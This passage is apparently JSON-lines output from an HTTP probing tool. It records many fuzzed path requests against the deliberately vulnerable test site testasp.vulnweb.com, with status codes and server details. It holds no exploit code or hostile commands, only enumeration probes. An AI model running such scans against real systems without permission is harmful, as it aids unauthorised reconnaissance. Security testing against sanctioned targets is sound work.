Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:16.433111489Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?.com/static/p/video\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt%3F.com/static/p/video\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?.com/static/p/video\",\"time\":\"342.678739ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:16.438996184Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?.com/research/modules/home\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt%3F.com/research/modules/home\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?.com/research/modules/home\",\"time\":\"356.784805ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:16.687088726Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?.jpg\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt%3F.jpg\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?.jpg\",\"time\":\"344.35688ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:16.745610715Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt^1918\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt%5E1918\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt%5E1918\",\"time\":\"344.521778ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:16.818565206Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt^gnaatmge^1906\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt%5Egnaatmge%5E1906\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt%5Egnaatmge%5E1906\",\"time\":\"348.840406ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:16.839068831Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt^sample@email.tst\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt%5Esample@email.tst\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt%5Esample@email.tst\",\"time\":\"352.578705ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:16.842524681Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt|acUn3t1x\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt%7CacUn3t1x\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt%7CacUn3t1x\",\"time\":\"348.051516ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:16.942704632Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt”\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt%E2%80%9D\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt%E2%80%9D\",\"time\":\"354.705354ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:17.123662073Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt,1,1803,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt,1,1803,0,active\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt,1,1803,0,active\",\"time\":\"343.239273ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:17.185437704Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt,1,1804,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt,1,1804,0,active\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt,1,1804,0,active\",\"time\":\"349.233972ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:17.185921187Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt,1,1806,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt,1,1806,0,active\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt,1,1806,0,active\",\"time\":\"340.552765ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:17.192792342Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt,1,1807,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt,1,1807,0,active\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt,1,1807,0,active\",\"time\":\"343.314956ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:17.195037665Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt,1,1805,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt,1,1805,0,active\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt,1,1805,0,active\",\"time\":\"352.644293ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:17.207019667Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt,1,1808,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt,1,1808,0,active\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt,1,1808,0,active\",\"time\":\"348.334866ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:17.23762282Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt,1,1809,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt,1,1809,0,active\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt,1,1809,0,active\",\"time\":\"347.10314ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:17.318742858Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt,1,1810,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt,1,1810,0,active\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt,1,1810,0,active\",\"time\":\"347.283675ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:17.376645123Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt,1,1811,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt,1,1811,0,active\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt,1,1811,0,active\",\"time\":\"342.280245ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:26.662914472Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt,1,1812,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt,1,1812,0,active\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt,1,1812,0,active\",\"time\":\"340.961967ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:26.701698343Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt,1,1813,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt,1,1813,0,active\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt,1,1813,0,active\",\"time\":\"352.200837ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:26.714923919Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt,1,1814,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt,1,1814,0,active\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt,1,1814,0,active\",\"time\":\"347.998822ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:26.725962878Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt,1,1816,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt,1,1816,0,active\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt,1,1816,0,active\",\"time\":\"351.860922ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:26.725982964Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt,1,1815,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt,1,1815,0,active\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt,1,1815,0,active\",\"time\":\"356.875528ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:26.729021562Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt,1,1817,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt,1,1817,0,active\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt,1,1817,0,active\",\"time\":\"344.515026ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:26.739488428Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt,1,1818,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt,1,1818,0,active\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt,1,1818,0,active\",\"time\":\"352.553527ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:26.747403762Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt,1,1820,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt,1,1820,0,active\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt,1,1820,0,active\",\"time\":\"343.80592ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:26.75658261Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt,1,1819,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt,1,1819,0,active\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt,1,1819,0,active\",\"time\":\"356.784846ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:26.765142632Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt,1,1821,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt,1,1821,0,active\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt,1,1821,0,active\",\"time\":\"348.410382ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:26.773593325Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt,1,1823,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt,1,1823,0,active\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt,1,1823,0,active\",\"time\":\"347.277674ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:26.781149114Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt,1,1822,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt,1,1822,0,active\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt,1,1822,0,active\",\"time\":\"356.064975ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:26.789820656Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt,1,1826,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt,1,1826,0,active\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt,1,1826,0,active\",\"time\":\"346.576314ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:26.790321119Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt,1,1824,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt,1,1824,0,active\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt,1,1824,0,active\",\"time\":\"356.122845ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:26.798183552Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt,1,1825,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt,1,1825,0,active\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt,1,1825,0,active\",\"time\":\"360.551127ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:27.030933625Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt,1,1827,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt,1,1827,0,active\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt,1,1827,0,active\",\"time\":\"339.597785ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:27.105860511Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt,1,1828,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt,1,1828,0,active\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt,1,1828,0,active\",\"time\":\"356.040088ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:27.172273855Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt,1,1829,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt,1,1829,0,active\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt,1,1829,0,active\",\"time\":\"346.820493ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:27.199302751Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt,1,1830,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt,1,1830,0,active\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt,1,1830,0,active\",\"time\":\"356.51606ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:27.209313412Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt,1,1831,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt,1,1831,0,active\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt,1,1831,0,active\",\"time\":\"361.62321ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:27.308983585Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt,1,1832,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt,1,1832,0,active\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt,1,1832,0,active\",\"time\":\"362.092962ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows 